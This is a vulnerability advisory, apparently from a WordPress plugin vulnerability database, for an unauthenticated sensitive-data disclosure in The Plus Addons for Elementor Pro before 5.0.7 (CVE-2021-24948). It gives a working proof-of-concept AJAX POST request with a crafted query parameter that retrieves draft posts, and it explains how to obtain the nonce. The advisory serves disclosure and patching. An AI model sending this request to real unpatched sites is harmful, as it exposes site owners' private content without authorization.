WordPress Plugin Vulnerabilities

The Plus Addons for Elementor Pro < 5.0.7 - Sensitive Data Disclosure

Description

The plugin does not validate the qvquery parameter of the tp_get_dl_post_info_ajax AJAX action, which could allow unauthenticated users to retrieve sensitive information, such as private and draft posts

Proof of Concept

The following request allow an unauthenticated user to get the draft posts (the nonce can be retrieved by looking at the source code of pages/posts for 'var theplus_nonce = "xxxx";')

POST /wp-admin/admin-ajax.php HTTP/2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

action=tp_get_dl_post_info_ajax&security=a71d02fefb&product_id=1&qvquery=post%26post_status=draft%26p=%26post_type=any%26nopaging=true

Affects Plugins

Plugin icon
theplus_elementor_addon
Fixed in 5.0.7

References

CVE
CVE-2021-24948
URL
https://roadmap.theplusaddons.com/updates

Classification

Type
SENSITIVE DATA DISCLOSURE
OWASP top 10
A3: Sensitive Data Exposure
CWE
CWE-200
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Nicolas Vidal from TEHTRIS
Submitter
Nicolas Vidal from TEHTRIS
Verified
Yes
WPVDB ID
2b67005a-476e-4772-b15c-3191911a50b0

Timeline

Publicly Published
2021-12-13 (about 2 years ago)
Added
2021-12-13 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2022-10-31
Title
DeepL Pro API Translation < 1.7.5 - API Key Disclosure
Published
2024-03-21
Title
LiquidPoll – Polls, Surveys, NPS and Feedback Reviews < 3.3.77 - Information Exposure
Published
2022-11-10
Title
Clerk < 4.0.0 - Authentication Bypass and API Keys Disclosure
Published
2023-10-13
Title
Migration, Backup, Staging - WPvivid < 0.9.92 - Unauthenticated Sensitive Information Exposure
Published
2022-09-26
Title
Helpful < 4.5.26 - Information Disclosure